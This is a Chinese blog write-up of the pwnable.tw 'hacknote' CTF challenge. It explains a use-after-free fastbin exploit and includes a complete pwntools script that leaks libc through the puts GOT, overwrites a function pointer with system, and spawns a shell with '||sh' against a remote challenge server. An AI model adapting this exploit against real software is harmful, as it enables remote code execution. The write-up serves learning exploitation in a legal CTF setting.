pwnable.tw hacknote

于 2021-07-14 22:21:16 发布
阅读量128 收藏
点赞数
分类专栏: pwnable.tw pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46521144/article/details/118738452
版权
本文详细分析了一种利用Fastbin Double Free漏洞来劫持puts函数的技术,通过操纵内存分配和释放,构造特定的chunk布局,最终实现对puts函数的控制。在漏洞利用过程中,提到了不能使用/bin/sh作为system参数,而是采用' || sh'的技巧。文章还展示了利用过程,包括添加、删除和显示笔记的操作,以及如何泄露libc基址并找到system函数地址,最后触发代码执行。
摘要由CSDN通过智能技术生成

hacknote

主要考察:uaf,fastbin数据结构

分析程序流程可知,在add部分,创建的数据结构如下所示
在这里插入图片描述用图片直观表示,就是
在这里插入图片描述

所有被分配的chunk数据结构都是puts块+数据块,并且puts块大小固定。注意到每次free的时候两个快都会被free,并且存在uaf,考虑在free两个块之后,一次malloc 0x8大小的内容,再执行show,那么malloc(0x8)时候调用的puts函数即可被劫持,因为0x10大小的块全被放在了一个fastbin中,我们add一个0x8的块,会从fastbin中取出两个0x8的块,并且可以控制其中一个的内容。将其中的指针部分(上图中的pointer)换掉可以泄露内容;将my_puts换掉可以执行特定函数。这里复习一下fastbin是单向链表,头插法并且从头取出,先进后出。
需要注意的是:不能使用/bin/sh作为system参数。这里只有四字节,需要使用”||sh",在shell语言中

from pwn import *
from LibcSearcher import *
io = process('./hacknote')
context.log_level = 'debug'
# libc = ELF('./libc_32.so.6')
io = remote('node4.buuoj.cn',28472)
elf=ELF('./hacknote')

def add(size,content):
    io.recvuntil('Your choice :')
    io.sendline(str(1))
    io.recvuntil('Note size :')
    io.sendline(str(size))
    io.recvuntil('Content :')
    io.sendline(str(content))
    io.recvline()

def show(id):
    io.recvuntil('Your choice :')
    io.sendline(str(3))
    io.recvuntil('Index :')
    io.sendline(str(id))

def delete(id):
    io.recvuntil('Your choice :')
    io.sendline(str(2))
    io.recvuntil('Index :')
    io.sendline(str(id))
    io.recvline()



puts_got = elf.got['puts']

add(0x20,'aaaa') #0
add(0x20,'bbbb') #1
delete(0)
delete(1)
add(0x8,p32(0x0804862B)+p32(puts_got)) #2
show(0)
puts_plt = u32(io.recvuntil('\xf7'))
libc = LibcSearcher('puts',puts_plt)
libc_base = puts_plt - libc.dump('puts')
print "libc_base----->" + hex(libc_base)

system = libc.dump('system') + libc_base
delete(2)
add(0x8,p32(system)+'||sh')
# gdb.attach(io,"b *0x080488A5")
show(0)


io.interactive()
N1ch0l4s
关注
专栏目录
Assassins.Creed.III.TW.THETA.RIP.torrent
07-20
Assassins.Creed.III.TW.THETA.RIP.torrent3DMGAME.Assassins.Creed.III.TW.THETA.RIP.torrent3DMGAME.Assassins.Creed.III.TW.THETA.RIP.torrent3DMGAME.Assassins.Creed.III.TW.THETA.RIP.torrent3DMGAME....
pwnable.twhacknote
qq_35429581的博客
10-13 2918
uaf漏洞产生的主要原因是释放了一个堆块后,并没有将该指针置为NULL,这样导致该指针处于悬空的状态(有的地方翻译为迷途指针),同样被释放的内存如果被恶意构造数据,就有可能会被利用。 再怎么表述起始还不如真的拿一道题自己调自己看内存看堆状态来的好理解。这也是我觉得ctf-pwn的意义所在,可以把一些漏洞抽象出来以题的形式,作为学习这方面的一个抓手。 此篇尽量做的细致基础,但仍然假设读者已经初步
pwnable.tw - hacknote(uaf漏洞利用)
fanghuapyk的博客
12-07 456
pwnable.tw -hacknote 前言: 看了几个大佬写的pwnable.tw-hacknote ,自己也尝试写一下; 程序分析: 首先运行一下程序 发现这里有add_note ,delete_note ,print_note三个功能,我们看一下main函数,add_note,和delete_note 函数, main函数: add_note函数: 可以看到首先为ptr+note_offs...
pwnable.tw——hacknote
40KO的博客
02-24 839
很少做pwn,之前也只懂点rop,现在跟着练练pwn的堆利用吧,pwnable.tw上的一题hacknote,比较纯粹的uaf题目,还好不久前看了点glibc内存管理的东西,可以派上用场了。 逆向很轻松,那为什么不直接给源码呢。。。根据add_note函数很容易了解note的结构体特征 unsigned int add_node() { note *v0; // ebx signed...
pwnable.tw——hacknote分析
Eagle_hwei的博客
02-24 426
hacknote的题目分析 2020-02-2421:22:47 by hawkJW 题目附件、ida文件及wp链接   这是一道比较经典的题目,所以稍微记录一下   1.  程序流程总览 首先,还是老规矩,看一下保护情况   可以看出来,PIE没有开启,可以修改got表,其余基本上都开启了,保护程度一般吧。下面我们来看一下程序的具体流程吧。 没什么好说的,还是比较经典的...
rate.bot.com.tw:台湾银行黄金价格抓取程式
06-11
台湾银行黄金价格抓取程式 序 此程式以语言撰写,以日期为参数抓取台湾银行。... GET http://rate.bot.com.tw/Pages/UIP005/UIP00511.aspx?whom=GB0030001000&afterOrNot=0&curcd=TWD&date=20000101 只需变换date参数。
28365365.tw_11个单页源码.rar
10-07
标题中的"28365365.tw_11个单页源码.rar"表明这是一个包含11个单页网站源代码的压缩文件,主要用于28365365.tw这个域名的相关网页设计。单页源码是指只有一屏或者滚动浏览到底的网页设计,这种设计通常用于简洁明了...
ha2.tw
03-28
ha2.tw 项目设置 npm install 编译和热重装以进行开发 npm run serve 编译并最小化生产 npm run build 整理和修复文件 npm run lint 自定义配置 请参阅。
MP4播放器_mp4播放器_player_mp4_mp4ba.tw_
10-03
【标题】"MP4播放器_mp4播放器_player_mp4_mp4ba.tw_" 指的是一个专注于播放MP4格式视频文件的播放器。在数字媒体领域,MP4是一种广泛使用的视频编码格式,它能够有效地压缩视频数据,同时保持较高的画质。MP4播放器...
Pwnable.tw WP
AlexYoung28的博客
08-18 882
Pwnable.tw start 我们分析上图程序的汇编代码: 上图中的第一个方框,其实是将 : Let's start the CTF:  这句字符串压进栈; 第二个方框:其实是 system_write()函数, 参数中 fd =1, 说明是标准输出,也就是将 字符串打印输出在屏幕上; 第三个方框: 其实 标准输入函数,允许输入的长度是 3ch 也就是 60个字节; 但是buffe...
hackme inndy pwn tictactoe writeup
charlie_heng的专栏
01-03 549
昨天立的果然是个flag。。。。还是忍不住做了 这题ai其实很容易破,有个任意内存写,直接写到胜利就可以了 但是怎么get shell呢? 看了下,发现初始化的时候把一段地址设为可写了,那段地址存的是DT_SYMTAB之类的地址,所以很明显,这题是ret2dlresolve,那么怎么改呢? 最快的方法是改DT_STRTAB,当执行到memset的时候,把它的字符串变为system,然后再将...
pwnable.tw记录之applestore
qq_35429581的博客
10-31 1440
耐下心用ida分析: 主要功能函数handler: create函数malloc一块16字节的内存,分别存放:char* name,int price,struct * bk ,struct * fd   ,由insert()函数将当前商品的结构体插入链表尾部。链表的起始位置记录在全局变量 myCart(0x0804B068)中。 delete函数进行链表的拆卸: 一开始觉
看雪wifi万能钥匙CTF年中赛 第四题 writeup(2)
ACdream
01-04 624
看雪CTF
pwnable.tw hacknote write up
qq_43189757的博客
09-08 272
程序分析: 程序有四个操作: 1.Add note 2.Delete note 3.Print note 4.Exit 1.Add note 在bss段中存放note的指针,每一个note 包含两个堆块,add的过程中第一个堆块的数据区的开始四字节存放调用puts的函数地址(0x804862b),随后四个字节存放后面存放content 的堆块的地址 2.Delete note 漏洞点发生在Dele...
buu-pwn-heap刷题日记
abelxu
10-25 1161
一开始的题解忘记记录题解了。每天刷两道pwn题 babyfengshui_33c3_2016 https://blog.csdn.net/qinying001/article/details/104359401 漏洞点在Update函数的比较部分。将des_addr+length和Node_addr - 4进行比较。 [V&N2020 公开赛]simpleHeap https://blog.csdn.net/qq_39869547/article/details/104587504 https://
pwnable tw Death Note writeup
charlie_heng的专栏
03-01 1104
pwnable tw的题做到后面越来越骚了……脑洞太大… 这题其实是printable shellcode 一开始完全没思路,后面搜了下,发现了一个神器 https://github.com/VincentDary/PolyAsciiShellGen 能将shellcode转化为可打印字符 看了下生成的shellcode,发现其实它是利用 sub eax,xxxx 来将eax设置为任意值,...
use after free HITCON-training (lab 10 hacknote)
九层台
08-06 874
liu@liu-F117-F:~/1t/u18/文档/堆溢出学习/use after free$ checksec hacknote [*] '/home/liu/1t/u18/\xe6\x96\x87\xe6\xa1\xa3/\xe5\xa0\x86\xe6\xba\xa2\xe5\x87\xba\xe5\xad\xa6\xe4\xb9\xa0/use after free/hacknote' ...
pwnable_hacknote
qq_41560595的博客
04-09 804
IDA,F5 main函数 add_note 函数 notelist是4字节。在源代码中,每个notelist[i]装的是新malloc的地址。 *notelist指向这个地址的内容。 *notelist[i]=print_note_content ,print_note_content又是4个字节。 v1指针指向notelist[0]的内容,即新的malloc地址。那么*notelist内容就可以被分为v1[0]和v1[1]。v1[0]的内容是print_note_content返回值。 v1[1]
开发Internet Explorer右键菜单:0rz.tw缩网址示例
本文档详细介绍了如何在Internet Explorer浏览器中自定义右键功能表(ContextMenu),以0rz.tw的缩网址功能为例进行说明。在开发过程中,关键步骤包括以下几个方面: 1. 注册表结构:Internet Explorer的右键菜单...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值